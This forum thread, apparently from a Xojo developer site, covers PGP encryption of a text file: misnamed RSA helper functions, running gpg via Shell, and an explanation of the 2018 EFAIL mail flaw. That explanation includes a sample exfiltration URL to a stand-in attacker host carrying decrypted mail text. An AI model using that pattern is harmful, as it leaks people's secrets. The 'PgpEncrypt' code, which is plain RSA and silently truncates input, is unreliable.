PGP Encryption

Hello everyone,

So, I want to use PGP public key encryption on a txt file using Xojo. I have checked the Crypto library but I could not find anything on PGP, only RSA and hashing. My cryptography knowledge is kinda rusty, but if I recall correctly RSA is different from PGP. Is there some way to use PGP with Xojo?

Thank you in advance for your help.

The easiest way, pure Xojo:

[code]Function PgpDecrypt(ToDecrypt As String, myPrivateKey As String) As String
  // Description: decrypt the hex-encoded input string with myPrivateKey
  // using Crypto.RSADecrypt. Returns "" when no key is given or decryption fails.

  Try

    If myPrivateKey <> "" Then

      Dim sToDecrypt As String = DecodeHex(ToDecrypt)
      Dim msg As MemoryBlock = sToDecrypt

      Dim decryptedData As MemoryBlock = Crypto.RSADecrypt(msg, myPrivateKey)
      If decryptedData <> Nil Then
        Return decryptedData
      Else
        Return ""
      End If

    Else
      Return ""
    End If

  Catch err As RuntimeException

    Return ""

  End Try
End Function

Function PgpEncrypt(ToEncrypt As String, myPublicKey As String) As String
  // Description: encrypt the input string with myPublicKey using Crypto.RSAEncrypt
  // and return the ciphertext hex-encoded. Returns "" when no key is given or encryption fails.

  // WARNING: max length of 'ToEncrypt' = 86 characters

  Try

    If myPublicKey <> "" Then

      // The max input length for Crypto.RSAEncrypt seems to be 86 characters
      // (consistent with a 1024-bit key and OAEP/SHA-1 padding: 128 - 2*20 - 2 = 86).
      // Longer input is truncated here so that no RuntimeException is raised.
      Dim msg As MemoryBlock = DefineEncoding(Left(ToEncrypt, 86), Nil)

      Dim encryptedData As MemoryBlock = Crypto.RSAEncrypt(msg, myPublicKey)
      If encryptedData <> Nil Then
        Return EncodeHex(encryptedData)
      Else
        Return ""
      End If

    Else
      Return ""
    End If

  Catch err As RuntimeException

    Return ""

  End Try

End Function[/code]

Thank you for the quick reply, will try it and let you know :wink:

I got a Crypto exception "BER Decode Error". I guess it is from the key format, which is a string and looks something like this:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP Universal 2.9.1 (Build 347)
-----END PGP PUBLIC KEY BLOCK-----

From what I saw the Xojo-created RSA keys are hex. How do I convert it to that?

Remove the "EncodeHex" from the code.

No idea.

As PGP is GPL licensed, we do not have a Plugin, but you can use the command line tools via shell.

I am using Gpg4win for the encoding, and when I run the commands from the cmd I have no issues. But when I run them through Xojo the shell does not seem to recognize the commands.

The command is "gpg --encrypt --sign -r UserID1 -r UserID2 testEncrypt.txt".

Are we sure that Xojo can execute commands from a third party like the above?

What does your code look like exactly? What error do you get?

Most likely you need the full path to gpg.

Here is the current code.

[code]Dim textOutput As TextOutputStream
Dim fPaste As FolderItem
fPaste = SpecialFolder.Desktop.Child("Temp.bat")

textOutput = TextOutputStream.Create(fPaste)

textOutput.WriteLine("gpg --encrypt --sign -r UserID1 -r UserID2 testEncrypt.txt")
textOutput.Close // flush and release the .bat file before running it

Dim s As New Shell
s.Execute("start c:\Users\Vasilis\Desktop\Temp.bat")[/code]

In this attempt I have made a .bat file and tried to run it through that.

The file gets created, but the message I get (because I used start) through the cmd is "gpg is not recognized as an internal or external command". BUT, when I run the .bat manually it gets executed and it creates my encoded file.

PS: I have tried "c:\Program Files (x86)\GnuPG\bin\gpg.exe --encrypt --sign -r UserID1 -r UserID2 testEncrypt.txt"
and "c:\Program Files (x86)\GnuPG\bin\gpg --encrypt --sign -r UserID1 -r UserID2 testEncrypt.txt" and I get "c:\Program is not recognized as an internal or external command".
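An added example (not code from the thread) of running GnuPG from Xojo's Shell with the executable path wrapped in quotes, which is what the "c:\Program is not recognized" message is about: cmd.exe splits an unquoted path at the space in "Program Files". It assumes the Gpg4win path posted above and a caller-supplied FolderItem for the text file; the function and variable names are chosen here.

```xojo
' Added example, not from the original post: call gpg.exe synchronously
' with its full quoted path and check the exit code instead of using a .bat file.
' Assumes the GnuPG install path from the thread and a FolderItem for the input file.

Function GpgEncryptAndSign(inputFile As FolderItem, recipients() As String) As Boolean
  ' Path from the thread; adjust for your install. The surrounding quotes matter:
  ' without them the command line is split at the space in "Program Files".
  Dim gpgPath As String = "C:\Program Files (x86)\GnuPG\bin\gpg.exe"

  ' --batch: no interactive questions; --yes: overwrite an existing .gpg output file.
  Dim cmd As String = """" + gpgPath + """ --batch --yes --encrypt --sign"
  For Each rcpt As String In recipients
    cmd = cmd + " -r """ + rcpt + """"
  Next
  ' Quote the input path too; gpg writes the output next to it as <name>.gpg.
  cmd = cmd + " """ + inputFile.NativePath + """"

  Dim sh As New Shell
  sh.Mode = 0          ' synchronous: Execute returns when gpg has finished
  sh.TimeOut = 30000   ' milliseconds; -1 would wait forever
  sh.Execute(cmd)

  If sh.ErrorCode <> 0 Then
    ' Non-zero exit: unknown recipient, missing key, untrusted key, etc.
    ' sh.Result holds gpg's captured output for the log.
    System.DebugLog("gpg failed (" + Str(sh.ErrorCode) + "): " + sh.Result)
    Return False
  End If
  Return True
End Function
```

Because of --sign, gpg needs the secret key's passphrase; a synchronous Shell has no console for a pinentry prompt, so test first with a key whose passphrase gpg-agent has already cached, or drop --sign if you only need encryption.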

The PGP standard is an RFC (https://www.ietf.org/rfc/rfc4880.txt) and you can use it as you see fit. But if you use the PGP/GPG source then you are limited to the GPL.

Note that security experts have recently found a major flaw in PGP (or GPG) in email usage. Perhaps other uses too.
"pgp security issue 2018"
There is more to be found on Google about this.

Hello @Derk Jochems,

that's not really a flaw of PGP/GPG for that matter. The actual versions correctly detect the manipulation of the "encrypted" message.
The problem is the default handling of the mail software plugins for GPG/PGP: auto-decrypting everything and not checking the manipulation code (MDC). The GPG CLI apps fail the decryption if it's not correct. It is the mail "plugins" which don't check and simply decrypt the mail.
If they would check and fail (or at least soft-fail) with an error / message, the user would know that something is wrong, and know about the broken mail, and could potentially abort the decryption?!

It's not breaking the encryption (RSA or else, or the OpenPGP standard); it's not even exfiltrating your keys. It's simply being able to send you an old encrypted e-mail and manipulate it so that (through the mail program's auto-decryption function) the encrypted mail gets decrypted and, as a URL "post" code, posted back via HTML to the attacker (like: http://evil-url.com/mail.php?Decrypted%20Mail%20Text, etc.)

PS: The same back-channel trick is "sometimes" used by spammers and scammers to check an e-mail address's "correctness" - nothing new about that.

And I also think HTML (mails) and secure encryption (PGP) don't go together. An encrypted mail should simply be plain text.
Or if the mail has to be HTML, at least the mail plugin should simply block external URLs / links till you allow it (or the loading) manually.

PS: And I don't think Signal (spoken for by the bug team and the EFF) is safer to use at the moment. A new Electron CVE is also compromising the security of the Signal app.

Sorry, I had to say something. The news around here are like the crypto is broken. It's not the crypto that is broken; it simply is the handling of the decryption with a broken MDC of an encrypted message by the mail clients which makes this "bug" possible.
PPS: Enigmail in Thunderbird does this correctly.

It's a bit like an SQL injection bug (the software not sanitizing the input). XKCD: Exploits of a Mom

Best Regards,

René Landscheidt

At least you filled it with more information, now we all have some more insight into what is what... :wink: